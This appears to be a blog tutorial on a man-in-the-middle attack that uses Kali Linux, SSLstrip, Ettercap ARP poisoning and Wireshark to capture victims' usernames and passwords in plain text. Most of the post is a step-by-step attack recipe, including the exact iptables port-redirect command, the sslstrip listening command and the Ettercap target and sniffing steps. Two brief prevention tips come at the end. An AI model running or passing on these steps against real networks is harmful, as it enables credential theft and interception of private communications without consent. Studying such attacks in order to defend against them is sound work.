Tools Used:- Kali Linux, SSL Strip, Wireshark, Ettercap
A MITM is a kind of cyber attack where a hacker/attacker compromises your network and starts redirecting all the network traffic through his own device. The hacker can see all your browsing information like your Passwords, Usernames, Emails, and even the messages you’re sending across.
These kinds of attack don’t tend to work with a website using “HTTPS.” But, with a tool like SSLstrip, it can easily strip the user “https” back to “http”. This means the attack will get your information in plain text.
Step1: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Go to terminal and type the command mentioned above. It will redirect Traffic port 80 to 10000
Step2: iptables -L -t nat
Step3: Open SSLstrip
Step4: Launch Wireshark and select interface eth0
Step5: sslstrip -l 10000
This step enables to listen to port 10000. -l in the command enables listening mode.
Step6: Run Ettercap
Sniffing->unified
Hosts-> View Hosts
Target1-> windows ipaddress , Target2-> something ending with .2
Step7: View Targets/ Target Lists
Step8: Arp Poisioning-> Sniff remote connections
Step9: Start Sniffing
The result will be obtained in a similar manner once the user will try to log into any site through a browser. As seen in the picture above the username and password will be displayed once the .user will login
Basic Ways to Prevent MITM Attack
- Always check if a site is using “https”. If the site does use “https,” and it automatically changes to “http”, know there’s a “MITMA” happening on the network.
- Don’t share your WiFi password with people you don’t know or trust. Cause information tend to be not encrypted inside the same network, hence all the information can be easily seen.
Comments
Post a Comment